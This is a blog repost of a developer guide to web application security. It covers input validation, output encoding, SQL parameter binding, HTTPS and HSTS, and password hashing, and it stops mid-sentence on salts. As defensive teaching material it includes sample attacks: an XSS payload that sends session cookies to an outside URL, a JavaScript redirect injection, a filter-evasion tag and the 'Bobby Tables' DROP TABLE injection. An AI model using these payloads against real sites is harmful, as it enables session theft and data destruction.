Ketan's Home

August 27, 2016

Basics of Web Application Security: Authentication

Filed under: Uncategorized — ketan @ 3:04 PM

The modern software developer has to be something of a swiss army knife. Of course,
you need to write code that fulfills customer functional requirements. It needs to be
fast. Further you are expected to write this code to be comprehensible and extensible:
sufficiently flexible to allow for the evolutionary nature of IT demands, but stable
and reliable. You need to be able to lay out a useable interface, optimize a database,
and often set up and maintain a delivery pipeline. You need to be able to get these
things done by yesterday.

Somewhere, way down at the bottom of the list of requirements, behind, fast, cheap,
and flexible is “secure”. That is, until something goes wrong, until the system you
build is compromised, then suddenly security is, and always was, the most important
thing.

Security is a cross-functional concern a bit like Performance. And a bit unlike
Performance. Like Performance, our business owners often know they need Security, but
aren’t always sure how to quantify it. Unlike Performance, they often don’t know
“secure enough” when they see it.

So how can a developer work in a world of vague security requirements and unknown
threats? Advocating for defining those requirements and identifying those threats is a
worthy exercise, but one that takes time and therefore money. Much of the time
developers will operate in absence of specific security requirements and while their
organization grapples with finding ways to introduce security concerns into the
requirements intake processes, they will still build systems and write code.

In this Evolving Publication, we will:

  • point out common areas in a web application that developers need to be particularly conscious of security risks
  • provide guidance for how to address each risk on common web stacks
  • highlight common mistakes developers make, and how to avoid them

Security is a massive topic, even if we reduce the scope to only browser-based web
applications. These articles will be closer to a “best-of” than a comprehensive
catalog of everything you need to know, but we hope it will provide a directed first
step for developers who are trying to ramp up fast.


Trust

Before jumping into the nuts and bolts of input and output, it’s worth mentioning
one of the most crucial underlying principles of security: trust. We have to ask
ourselves: do we trust the integrity of request coming in from the user’s browser?
(hint: we don’t). Do we trust that upstream services have done the work to make our
data clean and safe? (hint: nope). Do we trust the connection between the user’s
browser and our application cannot be tampered? (hint: not completely…). Do we trust
that the services and data stores we depend on? (hint: we might…)

Of course, like security, trust is not binary, and we need to assess our risk
tolerance, the criticality of our data, and how much we need to invest to feel
comfortable with how we have managed our risk. In order to do that in a disciplined
way, we probably need to go through threat and risk modeling processes, but that’s a
complicated topic to be addressed in another article. For now, suffice it to say
that we will identify a series of risks to our system, and now that they are
identified, we will have to address the threats that arise.


Reject Unexpected Form Input

HTML forms can create the illusion of controlling input. The form markup author
might believe that because they are restricting the types of values that a user can
enter in the form the data will conform to those restrictions. But rest assured, it
is no more than an illusion. Even client-side JavaScript form validation provides
absolutely no value from a security perspective.

Untrusted Input

On our scale of trust, data coming from the user’s browser, whether we are
providing the form or not, and regardless of whether the connection is
HTTPS-protected, is effectively zero. The user could very easily modify the markup
before sending it, or use a command line application like curl to submit unexpected
data. Or a perfectly innocent user could be unwittingly submitting a modified version
of a form from a hostile website. Same Origin Policy
doesn’t prevent a hostile site from submitting to your form handling endpoint. In
order to ensure the integrity of incoming data, validation needs to be handled on the
server.

But why is malformed data a security concern? Depending on your application logic and use of output encoding,
you are inviting the possibility of unexpected behavior, leaking data, and even providing
an attacker with a way of breaking the boundaries of input data into executable code.

For example, imagine that we have a form with a radio button that allows the user
to select a communication preference. Our form handling code has application logic
with different behavior depending on those values.

final String communicationType = req.getParameter("communicationType");
if ("email".equals(communicationType)) {
    sendByEmail();
} else if ("text".equals(communicationType)) {
    sendByText();
} else {
    sendError(resp, format("Can't send by type %s", communicationType));
}

This code may or may not be dangerous, depending on how the
sendError method is implemented. We are trusting that downstream logic processes untrusted content
correctly. It might. But it might not. We’re much better off if we can eliminate the
possibility of unanticipated control flow entirely.

So what can a developer do to minimize the danger that untrusted input will
have undesirable effects in application code? Enter input validation.

Input Validation

Input validation is the process of ensuring input data is consistent with application
expectations. Data that falls outside of an expected set of values can cause our
application to yield unexpected results, for example violating business logic,
triggering faults, and even allowing an attacker to take control of resources or the
application itself. Input that is evaluated on the server as executable code, such as a
database query, or executed on the client as HTML JavaScript is particularly dangerous.
Validating input is an important first line of defense to protect against this risk.

Developers often build applications with at least some basic input validation, for
example to ensure a value is non-null or an integer is positive. Thinking about how to
further limit input to only logically acceptable values is the next step toward reducing
risk of attack.

Input validation is more effective for inputs that can be restricted to a
small set. Numeric types can typically be restricted to values within a specific range.
For example, it doesn’t make sense for a user to request to transfer a negative amount
of money or to add several thousand items to their shopping cart. This strategy of limiting
input to known acceptable types is known as positive validation or
whitelisting. A whitelist could restrict to a string of a specific form
such as a URL or a date of the form “yyyy/mm/dd”. It could limit input length, a
single acceptable character encoding, or, for the example above, only values that are
available in your form.

Another way of thinking of input validation is that it is enforcement of the
contract your form handling code has with its consumer. Anything violating that
contract is invalid and therefore rejected. The more restrictive your contract,
the more aggressively it is enforced, the less likely your application is to fall prey
to security vulnerabilities that arise from unanticipated conditions.

You are going to have to make a choice about exactly what to do when input fails
validation. The most restrictive and, arguably most desirable is to reject it entirely, without
feedback, and make sure the incident is noted through logging or monitoring. But why
without feedback? Should we provide our user with information about why the data is
invalid? It depends a bit on your contract. In form example above, if you receive
any value other than "email" or "text", something funny is going on: you either have a
bug or you are being attacked. Further, the feedback mechanism might provide the
point of attack. Imagine the sendError method writes the text back to the screen as an error message
like "We’re unable to respond with communicationType". That’s all fine if the
communicationType is "carrier pigeon" but what happens if it looks like this?

<script>new Image().src = ‘http://ift.tt/1lWX1Hd?' + document.cookie</script>

You’ve now faced with the possibility of a reflective XSS attack that steals session
cookies. If you must provide user feedback, you are best served with a canned response that
doesn’t echo back untrusted user data, for example "You must choose email or text". If you
really can’t avoid rendering the user’s input back at them, make absolutely sure it’s
properly encoded (see below for details on output encoding).

In Practice

It might be tempting to try filtering the <script> tag to
thwart this attack. Rejecting input that contains known dangerous values is
a strategy referred to as negative validation or blacklisting.
The trouble with this approach is that the number of possible bad inputs is extremely
large. Maintaining a complete list of potentially dangerous input would be a costly
and time consuming endeavor. It would also need to be continually maintained. But
sometimes it’s your only option, for example in cases of free-form input. If you must
blacklist, be very careful to cover all your cases, write good tests, be as restrictive
as you can, and reference OWASP’s XSS Filter Evasion Cheat Sheet
to learn common methods attackers will use to circumvent your protections.

Resist the temptation to filter out invalid input. This is a practice commonly called
"sanitization". It is essentially a blacklist that removes undesirable input rather
than rejecting it. Like other blacklists, it is hard to get right and provides the
attacker with more opportunities to evade it. For example, imagine, in the case above,
you choose to filter out <script> tags. An attacker could bypass it
with something as simple as:

<scr<script>ipt>

Even though your blacklist caught the attack, by fixing it, you just reintroduced the
vulnerability.

Input validation functionality is built in to most modern frameworks and, when
absent, can also be found in external libraries that enable the developer to put
multiple constraints to be applied as rules on a per field basis. Built-in validation
of common patterns like email addresses and credit card numbers is a helpful
bonus. Using your web framework’s validation provides the additional advantage of
pushing the validation logic to the very edge of the web tier, causing invalid data
to be rejected before it ever reaches complex application code where critical mistakes
are easier to make.

Framework Approaches
Java Hibernate (Bean Validation)
ESAPI
Spring Built-in type safe params in Controller
Built-in Validator interface (Bean Validation)
Ruby on Rails Built-in Active Record Validators
ASP.NET Built-in Validation (see BaseValidator)
Play Built-in Validator
Generic JavaScript xss-filters
NodeJS validator-js
General Regex-based validation on application inputs

In Summary

  • White list when you can
  • Black list when you can’t whitelist
  • Keep your contract as restrictive as possible
  • Make sure you alert about the possible attack
  • Avoid reflecting input back to a user
  • Reject the web content before it gets deeper into application logic to
    minimize ways to mishandle untrusted data or, even better, use your web
    framework to whitelist input

Although this section focused on using input validation as a mechanism for protecting
your form handling code, any code that handles input from an untrusted source can be
validated in much the same way, whether the message is JSON, XML, or any other format,
and regardless of whether it’s a cookie, a header, or URL parameter string. Remember:
if you don’t control it, you can’t trust it. If it violates the contract, reject it!


Encode HTML Output

In addition to limiting data coming into an application, web application developers
need to pay close attention to the data as it comes out. A modern web application
usually has basic HTML markup for document structure, CSS for document style,
JavaScript for application logic, and user-generated content which can be any of
these things. It’s all text. And it’s often all rendered to the same document.

An HTML document is really a collection of nested execution contexts separated by
tags, like <script> or <style>. The developer
is always one errant angle bracket away from running in a very different execution
context than they intend. This is further complicated when you have additional
context-specific content embedded within an execution context. For example, both
HTML and JavaScript can contain a URL, each with rules all their own.

Output Risks

HTML is a very, very permissive format. Browsers try their best to render
the content, even if it is malformed. That may seem beneficial to the developer since
a bad bracket doesn’t just explode in an error, however, the rendering of badly formed
markup is a major source of vulnerabilities. Attackers have the luxury of injecting
content into your pages to break through execution contexts, without even having to worry
about whether the page is valid.

Handling output correctly isn’t strictly a security concern. Applications rendering
data from sources like databases and upstream services need to ensure that the
content doesn’t break the application, but risk becomes particularly high when rendering
content from an untrusted source. As mentioned in the prior section, developers should be rejecting
input that falls outside the bounds of the contract, but what do we do when we need
to accept input containing characters that has the potential to change our code, like
a single quote ("'") or open bracket ("<")? This is
where output encoding comes in.

Output Encoding

Output encoding is converting outgoing data to a final output format. The
complication with output encoding is that you need a different codec depending on how
the outgoing data is going to be consumed. Without appropriate output encoding, an
application could provide its client with misformatted data making it unusable, or
even worse, dangerous. An attacker who stumbles across insufficient or inappropriate
encoding knows that they have a potential vulnerability that might allow them to
fundamentally alter the structure of the output from the intent of the developer.

For example, imagine that one of the first customers of a system is the former
supreme court judge Sandra Day O’Connor. What happens if her name is rendered into
HTML?

<p>The Honorable Justice Sandra Day O'Connor</p>

renders as:

The Honorable Justice Sandra Day O'Connor

All is right with the world. The page is generated as we would expect. But this
could be a fancy dynamic UI with a model/view/controller architecture. These strings are
going to show up in JavaScript, too. What happens when the page outputs this to the
browser?

document.getElementById('name').innerText = 'Sandra Day O'Connor' //<--unescaped string

The result is malformed JavaScript. This is what hackers look for to break through
execution context and turn innocent data into dangerous executable code. If the Chief
Justice enters her name as

Sandra Day O';window.location='http://ift.tt/22S88jO';

suddenly our user has been pushed to a hostile site. If, however, we correctly
encode the output for a JavaScript context, the text will look like this:

'Sandra Day O\';window.location=\'http://ift.tt/22S88jO\';'

A bit confusing, perhaps, but a perfectly harmless, non-executable string. Note
There are a couple strategies for encoding JavaScript. This particular encoding uses
escape sequences to represent the apostrophe ("\'"), but it could
also be represented safely with the Unicode escape seqeence ("'").

The good news is that most modern web frameworks have mechanisms for rendering
content safely and escaping reserved characters. The bad news is that most of these
frameworks include a mechanism for circumventing this protection and developers often
use them either due to ignorance or because they are relying on them to render
executable code that they believe to be safe.

Cautions and Caveats

There are so many tools and frameworks these days, and so many encoding contexts
(e.g. HTML, XML, JavaScript, PDF, CSS, SQL, etc.), that creating a comprehensive list
is infeasible, however, below is a starter for what to use and avoid for encoding HTML
in some common frameworks.

If you are using another framework, check the documentation for safe output
encoding functions. If the framework doesn’t have them, consider changing frameworks
to something that does, or you’ll have the unenviable task of creating output
encoding code on your own. Also note, that just because a framework renders HTML
safely, doesn’t mean it’s going to render JavaScript or PDFs safely. You need to be
aware of the encoding a particular context the encoding tool is written for.

Be warned: you might be tempted to take the raw user input, and do the encoding
before storing it. This pattern will generally bite you later on.
If you were to encode the text as HTML prior to storage, you can run into problems if
you need to render the data in another format: it can force you to unencode the HTML,
and re-encode into the new output format. This adds a great deal of complexity and
encourages developers to write code in their application code to unescape the content,
making all the tricky upstream output encoding effectively useless. You are much better
off storing the data in its most raw form, then handling encoding at rendering time.

Finally, it’s worth noting that nested rendering contexts add an enormous amount
of complexity and should be avoided whenever possible. It’s hard enough to get a single
output string right, but when you are rendering a URL, in HTML within JavaScript, you
have three contexts to worry about for a single string. If you absolutely cannot avoid
nested contexts, make sure to de-compose the problem into separate stages, thoroughly
test each one, paying special attention to order of rendering. OWASP provides some guidance
for this situation in the DOM based XSS Prevention Cheat
Sheet

In Summary

  • Output encode all application data on output with an appropriate codec
  • Use your framework’s output encoding capability, if available
  • Avoid nested rendering contexts as much as possible
  • Store your data in raw form and encode at rendering time
  • Avoid unsafe framework and JavaScript calls that avoid encoding

Bind Parameters for Database Queries

Whether you are writing SQL against a relational database, using an object-relational
mapping framework, or querying a NoSQL database, you probably need to
worry about how input data is used within your queries.

The database is often the most crucial part of any web application since it
contains state that can’t be easily restored. It can contain crucial and sensitive
customer information that must be protected. It is the data that drives the
application and runs the business. So you would expect developers to take the most
care when interacting with their database, and yet injection into the database tier
continues to plague the modern web application even though it’s relatively easy
to prevent!

Little Bobby Tables

No discussion of parameter binding would be complete without including the famous
2007 "Little Bobby Tables" issue of xkcd:

To decompose this comic, imagine the system responsible for keeping track of
grades has a function for adding new students:

void addStudent(String lastName, String firstName) {
        String query = "INSERT INTO students (last_name, first_name) VALUES ('"
                + lastName + "', '" + firstName + "')";
        getConnection().createStatement().execute(query);
}

If addStudent is called with parameters "Fowler", "Martin", the resulting SQL is:

INSERT INTO students (last_name, first_name) VALUES ('Fowler', 'Martin')

But with Little Bobby’s name the following SQL is executed:

INSERT INTO students (last_name, first_name) VALUES ('XKCD', 'Robert’); DROP TABLE Students;-- ')

In fact, two commands are executed:

INSERT INTO students (last_name, first_name) VALUES ('XKCD', 'Robert')

DROP TABLE Students

The final "–" comments out the remainder of the original query, ensuring the SQL
syntax is valid. Et voila, the DROP is executed. This attack vector allows the user
to execute arbitrary SQL within the context of the application’s database user.
In other words, the attacker can do anything the application can do and more, which
could result in attacks that cause greater harm than a DROP, including violating data
integrity, exposing sensitive information or inserting executable code. Later we
will talk about defining different users as a secondary defense against this kind
of mistake, but for now, suffice to say that there is a very simple application-level
strategy for minimizing injection risk.

Parameter Binding to the Rescue

To quibble with Hacker Mom’s solution, sanitizing is very difficult to get right,
creates new potential attack vectors and is certainly not the right approach. Your
best, and arguably only decent option is parameter binding. JDBC, for example,
provides the PreparedStatement.setXXX() methods for this very purpose.
Parameter binding provides a means of separating executable code, such as SQL, from
content, transparently handling content encoding and escaping.

void addStudent(String lastName, String firstName) {
        PreparedStatement stmt = getConnection().prepareStatement("INSERT INTO students (last_name, first_name) VALUES (?, ?)");
        stmt.setString(1, lastName);
        stmt.setString(2, firstName);
        stmt.execute();
 }

Any full-featured data access layer will have the ability to bind variables and
defer implementation to the underlying protocol. This way, the developer doesn’t need
to understand the complexities that arise from mixing user input with executable code.
For this to be effective all untrusted inputs need to be bound. If SQL is built
through concatenation, interpolation, or formatting methods, none of the resulting
string should be created from user input.

Clean and Safe Code

Sometimes we encounter situations where there is tension between good security and
clean code. Security sometimes requires the programmer to add some complexity in order
to protect the application. In this case however, we have one of those fortuitous
situations where good security and good design are aligned. In addition to
protecting the application from injection, introducing bound parameters improves
comprehensibility by providing clear boundaries between code and content, and
simplifies creating valid SQL by eliminating the need to manage the quotes by hand.

As you introduce parameter binding to replace your string formatting or
concatenation, you may also find opportunities to introduce generalized binding
functions to the code, further enhancing code cleanliness and security. This
highlights another place where good design and good security overlap: de-duplication
leads to additional testability, and reduction of complexity.

Common Misconceptions

There is a misconception that stored procedures prevent SQL injection, but that
is only true insofar as parameters are bound inside the stored procedure. If the
stored procedure itself does string concatenation it can be injectable as well,
and binding the variable from the client won’t save you.

Similarly, object-relational mapping frameworks like ActiveRecord, Hibernate, or
.NET Entity Framework, won’t protect you unless you are using binding functions.
If you are building your queries using untrusted input without binding, the app
still could be vulnerable to an injection attack.

For more detail on the injection risks of stored procedures and ORMs, see security
analyst Troy Hunt’s article
Stored procedures and ORMs won’t save you from SQL injection".

Finally, there is a misconception that NoSQL databases are not susceptible to
injection attack and that is not true. All query languages, SQL or otherwise, require
a clear separation between executable code and content so the execution doesn’t
confuse the command from the parameter. Attackers look for points in the runtime
where they can break through those boundaries and use input data to change the
intended execution path. Even Mongo DB, which uses a binary wire protocol and language-specific API, reducing
opportunities for text-based injection attacks, exposes the
"$where" operator which is vulnerable to injection, as is demonstrated in this
article from the OWASP Testing Guide.
The bottom line is that you need to check the data store and driver documentation
for safe ways to handle input data.

Parameter Binding Functions

Check the matrix below for indication of safe binding functions of your chosen data
store. If it is not included in this list, check the product documentation.

Framework Encoded Dangerous
Raw JDBC Connection.prepareStatement() used with setXXX()
methods and bound parameters for all input.
Any query or update method called with string concatenation rather than
binding.
PHP / MySQLi prepare() used with bind_param for all input. Any query or update method called with string concatenation rather than binding.
MongoDB Basic CRUD operations such as find(), insert(), with BSON document field names controlled by application. Operations, including find, when field names are allowed to be determined by untrusted data or use of Mongo operations such as "$where" that allow arbitrary JavaScript conditions.
Cassandra Session.prepare used with BoundStatement and bound parameters for all input. Any query or update method called with string concatenation rather than binding.
Hibernate / JPA Use SQL or JPQL/OQL with bound parameters via setParameter Any query or update method called with string concatenation rather than binding.
ActiveRecord Condition functions (find_by, where) if used with hashes or bound parameters, eg:

where (foo: bar)
where ("foo = ?", bar) 
Condition functions used with string concatenation or interpolation:

where("foo = '#{bar}'")
where("foo = '" + bar + "'") 

In Summary

  • Avoid building SQL (or NoSQL equivalent) from user input
  • Bind all parameterized data, both queries and stored procedures
  • Use the native driver binding function rather than trying to handle the encoding yourself
  • Don’t think stored procedures or ORM tools will save you. You need to use
    binding functions for those, too
  • NoSQL doesn’t make you injection-proof

Protect Data in Transit

While we’re on the subject of input and output, there’s another important consideration: the
privacy and integrity of data in transit. When using an ordinary HTTP connection, users are
exposed to many risks arising from the fact data is transmitted in plaintext. An attacker
capable of intercepting network traffic anywhere between a user’s browser and a server can
eavesdrop or even tamper with the data completely undetected in a man-in-the-middle attack.
There is no limit to what the attacker can do, including stealing the user’s session or their
personal information, injecting malicious code that will be executed by the browser in the
context of the website, or altering data the user is sending to the server.

We can’t usually control the network our users choose to use. They very well might be using
a network where anyone can easily watch their traffic, such as an open wireless network in a
café or on an airplane. They might have unsuspectingly connected to a hostile wireless network
with a name like "Free Wi-Fi" set up by an attacker in a public place. They might be using an
internet provider that injects content such as ads into their web traffic, or they might even
be in a country where the government routinely surveils its citizens.

If an attacker can eavesdrop on a user or tamper with web traffic, all bets are off. The
data exchanged cannot be trusted by either side. Fortunately for us, we can protect against
many of these risks with HTTPS.

HTTPS and Transport Layer Security

HTTPS was originally used mainly to secure sensitive web traffic such as financial
transactions, but it is now common to see it used by default on many sites we use in our day
to day lives such as social networking and search engines. The HTTPS protocol uses the
Transport Layer Security (TLS) protocol, the successor to the Secure Sockets Layer (SSL)
protocol, to secure communications. When configured and used correctly, it provides
protection against eavesdropping and tampering, along with a reasonable guarantee that a
website is the one we intend to be using. Or, in more technical terms, it provides
confidentiality and data integrity, along with authentication of the website’s identity.

With the many risks we all face, it increasingly makes sense to treat all network traffic
as sensitive and encrypt it. When dealing with web traffic, this is done using HTTPS. Several
browser makers have announced their intent to deprecate non-secure HTTP and even display
visual indications to users to warn them when a site is not using HTTPS. Most HTTP/2
implementations in browsers will only support communicating over TLS. So why aren’t we using
it for everything now?

There have been some hurdles that impeded adoption of HTTPS. For a long time, it was
perceived as being too computationally expensive to use for all traffic, but with modern
hardware that has not been the case for some time. The SSL protocol and early versions of the
TLS protocol only support the use of one web site certificate per IP address, but that
restriction was lifted in TLS with the introduction of a protocol extension called SNI
(Server Name Indication), which is now supported in most browsers. The cost of obtaining a
certificate from a certificate authority also deterred adoption, but the introduction of free
services like Let’s Encrypt has eliminated that barrier. Today there are fewer hurdles than
ever before.

Get a Server Certificate

The ability to authenticate the identity of a website underpins the security of TLS. In
the absence of the ability to verify that a site is who it says it is, an attacker capable of
doing a man-in-the-middle attack could impersonate the site and undermine any other
protection the protocol provides.

When using TLS, a site proves its identity using a public key certificate. This
certificate contains information about the site along with a public key that is used to prove
that the site is the owner of the certificate, which it does using a corresponding private
key that only it knows. In some systems a client may also be required to use a certificate to
prove its identity, although this is relatively rare in practice today due to complexities in
managing certificates for clients.

Unless the certificate for a site is known in advance, a client needs some way to verify
that the certificate can be trusted. This is done based on a model of trust. In web browsers
and many other applications, a trusted third party called a Certificate Authority (CA) is
relied upon to verify the identity of a site and sometimes of the organization that owns it,
then grant a signed certificate to the site to certify it has been verified.

It isn’t always necessary to involve a trusted third party if the certificate is known in
advance by sharing it through some other channel. For example, a mobile app or other
application might be distributed with a certificate or information about a custom CA that
will be used to verify the identity of the site. This practice is referred to as certificate
or public key pinning and is outside the scope of this article.

The most visible indicator of security that many web browsers display is when
communications with a site are secured using HTTPS and the certificate is trusted. Without
it, a browser will display a warning about the certificate and prevent a user from viewing
your site, so it is important to get a certificate from a trusted CA.

It is possible to generate your own certificate to test a HTTPS configuration out, but you
will need a certificate signed by a trusted CA before exposing the service to users. For many
uses, a free CA is a good starting point. When searching for a CA, you will encounter
different levels of certification offered. The most basic, Domain Validation (DV), certifies
the owner of the certificate controls a domain. More costly options are Organization
Validation (OV) and Extended Validation (EV), which involve the CA doing additional checks to
verify the organization requesting the certificate. Although the more advanced options result
in a more positive visual indicator of security in the browser, it may not be worth the extra
cost for many.

Configure Your Server

With a certificate in hand, you can begin to configure your server to support HTTPS. At
first glance, this may seem like a task worthy of someone who holds a PhD in cryptography.
You may want to choose a configuration that supports a wide range of browser versions, but
you need to balance that with providing a high level of security and maintaining some level
of performance.

The cryptographic algorithms and protocol versions supported by a site have a strong
impact on the level of communications security it provides. Attacks with impressive sounding
names like FREAK and DROWN and POODLE (admittedly, the last one doesn’t sound all that
formidable) have shown us that supporting dated protocol versions and algorithms presents a
risk of browsers being tricked into using the weakest option supported by a server, making
attack much easier. Advancements in computing power and our understanding of the mathematics
underlying algorithms also renders them less safe over time. How can we balance staying up to
date with making sure our website remains compatible for a broad assortment of users who
might be using dated browsers that only support older protocol versions and algorithms?

Fortunately, there are tools that help make the job of selection a lot easier. Mozilla has
a helpful SSL Configuration Generator to
generate recommended configurations for various web servers, along with a complementary Server Side TLS Guide with more in-depth
details.

Note that the configuration generator mentioned above enables a browser security feature
called HSTS by default, which might cause problems until you’re ready to commit to using
HTTPS for all communications long term. We’ll discuss HSTS a little later in this article.

Use HTTPS for Everything

It is not uncommon to encounter a website where HTTPS is used to protect only some of the
resources it serves. In some cases the protection might only be extended to handling form
submissions that are considered sensitive. Other times, it might only be used for resources
that are considered sensitive, for example what a user might access after logging into the
site. Occasionally you might even come across a security article published on a site whose
server team hasn’t had time to update their configuration yet – but they will soon, we
promise!

The trouble with this inconsistent approach is that anything that isn’t served over HTTPS
remains susceptible to the kinds of risks that were outlined earlier. For example, an
attacker doing a man-in-the-middle attack could simply alter the form mentioned above to
submit sensitive data over plaintext HTTP instead. If the attacker injects executable code
that will be executed in the context of our site, it isn’t going to matter much that part of
it is protected with HTTPS. The only way to prevent those risks is to use HTTPS for
everything.

The solution isn’t quite as clean cut as flipping a switch and serving all resources over
HTTPS. Web browsers default to using HTTP when a user enters an address into their address
bar without typing "https://&quot; explicitly. As a result, simply shutting down the HTTP
network port is rarely an option. Websites instead conventionally redirect requests received
over HTTP to use HTTPS, which is perhaps not an ideal solution, but often the best one
available.

For resources that will be accessed by web browsers, adopting a policy of redirecting all
HTTP requests to those resources is the first step towards using HTTPS consistently. For
example, in Apache redirecting all requests to a path (in the example, /content and anything
beneath it) can be enabled with a few simple lines:

# Redirect requests to /content to use HTTPS (mod_rewrite is required)
RewriteEngine On
RewriteCond %{HTTPS} != on [NC]
RewriteCond %{REQUEST_URI} ^/content(/.*)?
RewriteRule ^ https://%{SERVER_NAME}%{REQUEST_URI} [R,L]

If your site also serves APIs over HTTP, moving to using HTTPS can require a more measured
approach. Not all API clients are able to handle redirects. In this situation it is advisable
to work with consumers of the API to switch to using HTTPS and to plan a cutoff date, then
begin responding to HTTP requests with an error after the date is reached.

Use HSTS

Redirecting users from HTTP to HTTPS presents the same risks as any other request sent
over ordinary HTTP. To help address this challenge, modern browsers support a powerful
security feature called HSTS (HTTP Strict Transport Security), which allows a website to
request that a browser only interact with it over HTTPS. It was first proposed in 2009 in
response to Moxie Marlinspike’s famous SSL stripping attacks, which demonstrated the dangers
of serving content over HTTP. Enabling it is as simple as sending a header in a response:

Strict-Transport-Security: max-age=15768000

The above header instructs the browser to only interact with the site using HTTPS for a
period of six months (specified in seconds). HSTS is an important feature to enable due to
the strict policy it enforces. Once enabled, the browser will automatically convert any
insecure HTTP requests to use HTTPS instead, even if a mistake is made or the user explicitly
types "http://&quot; into their address bar. It also instructs the browser to disallow the user
from bypassing the warning it displays if an invalid certificate is encountered when loading
the site.

In addition to requiring little effort to enable in the browser, enabling HSTS on the
server side can require as little as a single line of configuration. For example, in Apache
it is enabled by adding a Header directive within the VirtualHost
configuration for port 443:

<VirtualHost *:443>
    ...

    # HSTS (mod_headers is required) (15768000 seconds = 6 months)
    Header always set Strict-Transport-Security "max-age=15768000"
</VirtualHost>

Now that you have an understanding of some of the risks inherent to ordinary HTTP, you
might be scratching your head wondering what happens when the first request to a website is
made over HTTP before HSTS can be enabled. To address this risk some browsers allow websites
to be added to a "HSTS Preload List" that is included with the browsers. Once included in
this list it will no longer be possible for the website to be accessed using HTTP, even on
the first time a browser is interacting with the site.

Before deciding to enable HSTS, some potential challenges must first be considered. Most
browsers will refuse to load HTTP content referenced from a HTTPS resource, so it is
important to update existing resources and verify all resources can be accessed using HTTPS.
We don’t always have control over how content can be loaded from external systems, for
example from an ad network. This might require us to work with the owner of the external
system to adopt HTTPS, or it might even involve temporarily setting up a proxy to serve the
external content to our users over HTTPS until the external systems are updated.

Once HSTS is enabled, it cannot be disabled until the period specified in the header
elapses. It is advisable to make sure HTTPS is working for all content before enabling it for
your site. Removing a domain from the HSTS Preload List will take even longer. The decision
to add your website to the Preload List is not one that should be taken lightly.

Unfortunately, not all browsers in use today support HSTS. It can not yet be counted on as
a guaranteed way to enforce a strict policy for all users, so it is important to continue to
redirect users from HTTP to HTTPS and employ the other protections mentioned in this article.
For details on browser support for HSTS, you can visit Can I
use.

Protect Cookies

Browsers have a built-in security feature to help avoid disclosure of a cookie containing
sensitive information. Setting the "secure" flag in a cookie will instruct a browser to only
send a cookie when using HTTPS. This is an important safeguard to make use of even when HSTS
is enabled.

Other Risks

There are some other risks to be mindful of that can result in accidental disclosure of
sensitive information despite using HTTPS.

It is dangerous to put sensitive data inside of a URL. Doing so presents a risk if the URL
is cached in browser history, not to mention if it is recorded in logs on the server side. In
addition, if the resource at the URL contains a link to an external site and the user clicks
through, the sensitive data will be disclosed in the Referer header.

In addition, sensitive data might still be cached in the client, or by intermediate proxies
if the client’s browser is configured to use them and allow them to inspect HTTPS traffic. For
ordinary users the contents of traffic will not be visible to a proxy, but a practice we’ve
seen often for enterprises is to install a custom CA on their employees’ systems so their
threat mitigation and compliance systems can monitor traffic. Consider using headers to
disable caching to reduce the risk of leaking data due to caching.

For a general list of best practices, the OWASP Transport Protection Layer Cheat Sheet contains
some valuable tips.

Verify Your Configuration

As a last step, you should verify your configuration. There is a helpful online tool for
that, too. You can visit SSL Labs’
SSL Server Test to perform a deep analysis of your
configuration and verify that nothing is misconfigured. Since the tool is updated as new
attacks are discovered and protocol updates are made, it is a good idea to run this every few
months.

In Summary

  • Use HTTPS for everything!
  • Use HSTS to enforce it
  • You will need a certificate from a trusted certificate authority if you plan to trust normal web browsers
  • Protect your private key
  • Use a configuration tool to help adopt a secure HTTPS configuration
  • Set the "secure" flag in cookies
  • Be mindful not to leak sensitive data in URLs
  • Verify your server configuration after enabling HTTPS and every few months thereafter

Hash and Salt Your Users’ Passwords

When developing applications, you need to do more than protect your assets from
attackers. You often need to protect your users from attackers, and even from themselves.

Living Dangerously

The most obvious way to write password-authentication is to store username and
password in table and do look ups against it. Don’t ever do this:

-- SQL
CREATE TABLE application_user (
  email_address VARCHAR(100) NOT NULL PRIMARY KEY,
  password VARCHAR(100) NOT NULL
)

# python
def login(conn, email, password):
  result = conn.cursor().execute(
    "SELECT * FROM application_user WHERE email_address = ? AND password = ?",
    [email, password])
  return result.fetchone() is not None

Does this work? Will it allow valid users in and keep unregistered users out?
Yes. But here’s why it’s a very, very bad idea:

The Risks

Insecure password storage creates risks from both insiders and outsiders.
In the former case, an insider such as an application developer or DBA who can
read the above application_user table now has access to the credentials of your
entire user base. One often overlooked risk is that your insiders can now
impersonate your users within your application. Even if that particular scenario
isn’t of great concern, storing your users’ credentials without appropriate
cryptographic protection introduces an entirely new class of attack vectors for
your user, completely unrelated to your application.

We might hope it’s otherwise, but the fact is that users reuse credentials. The
first time someone signs up for your site of captioned cat pictures using the
same email address and password that they use for their bank login, your
seemingly low-risk credentials database has become a vehicle for storing
financial credentials. If a rogue employee or an external hacker steals your
credentials data, they can use them for attempted logins to major bank sites
until they find the one person who made the mistake of using their credentials
with wackycatcaptions.org, and one of your user’s accounts is drained of funds and
you are, at least in part, responsible.

That leaves two choices: either store credentials safely or don’t store them at all.

I Can Hash Passwordz

If you went down the path of creating logins for your site, option two is probably
not available to you, so you are probably stuck with option one. So what is involved
in safely storing credentials?

Firstly, you never want to store the password itself, but rather store a hash of
the password. A cryptographic hashing algorithm is a one-way transformation from
an input to an output from which the original input is, for all practical purposes,
impossible to recover. More on that "practical purposes" phrase shortly. For example,
your password might be "littlegreenjedi". Applying Argon2 with the salt
"12345678" (more on salts later) and default command-line options, gives you the the hex result
9b83665561e7ddf91b7fd0d4873894bbd5afd4ac58ca397826e11d5fb02082a1. Now you aren’t
storing the password at all, but rather this hash. In order to validate a user’s
password, you just apply the same hash algorithm to the password text they send,
and, if they match, you know the password is valid.

So we’re done, right? Well, not exactly. The problem now is that, assuming we don’t
vary the salt, every user with the password "littlegreenjedi" will have the same
hash in our database. Many people just re-use their same old password.
Lookup tables generated using the most commonly occurring passwords
and their variations can be used to efficiently reverse engineer hashed passwords.
If an attacker gets hold of your password store, they can simply cross-reference a
lookup table with your password hashes and are statistically likely to extract a
lot of credentials in a pretty short period of time.

The trick is to add a bit of unpredictability into the password hashes so they
cannot be easily reverse engineered. A salt, when properly generated, can provide
just that.

A Dash of Salt

A salt is some extra data that is added to the password before it is hashed so that
two instances of a given password do not have the same hash value. The real benefit
here is that it increases the range of possible hashes of a given password beyond
the point where it is practical to pre-compute them. Suddenly the hash of "littlegreenjedi"
can’t be predicted anymore. If we use the salt the string "BNY0LGUZWWIZ3BVP" and
then hash with Argon2 again, we get
67ddb83d85dc6f91b2e70878f333528d86674ecba1ae1c7aa5a94c7b4c6b2c52. On the other
